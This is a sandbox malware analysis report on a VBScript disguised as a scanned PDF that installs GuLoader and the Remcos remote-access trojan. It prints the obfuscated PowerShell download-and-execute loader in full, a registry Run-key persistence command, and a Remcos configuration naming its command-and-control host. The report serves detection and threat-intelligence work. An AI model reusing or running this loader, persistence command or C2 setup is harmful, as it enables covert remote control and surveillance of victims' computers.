Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanned_22C-6e24090516030.pdf.vbs

Overview

General Information

Sample name:Scanned_22C-6e24090516030.pdf.vbs
Analysis ID:1538696
MD5:1c78cc71bf8db131a33f156feff9ec4d
SHA1:af06e517411ac017868488d8a7173bb2d5d98012
SHA256:e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7784 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7912 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7216 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6596 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["blackass.duckdns.org:65253:1", "blackass.duckdns.org:53241:1"], "Assigned name": "Rm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-K8KWVT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 8 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7972.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7216.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc623:$b2: ::FromBase64String(
              • 0xb67c:$s1: -join
              • 0x4e28:$s4: +=
              • 0x4eea:$s4: +=
              • 0x9111:$s4: +=
              • 0xb22e:$s4: +=
              • 0xb518:$s4: +=
              • 0xb65e:$s4: +=
              • 0x1572c:$s4: +=
              • 0x157ac:$s4: +=
              • 0x15872:$s4: +=
              • 0x158f2:$s4: +=
              • 0x15ac8:$s4: +=
              • 0x15b4c:$s4: +=
              • 0xbeb7:$e4: Get-WmiObject
              • 0xc0a6:$e4: Get-Process
              • 0xc0fe:$e4: Start-Process
              • 0x163dc:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", ProcessId: 7784, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7044, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ProcessId: 6596, ProcessName: reg.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.103.62.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7092, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49973
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
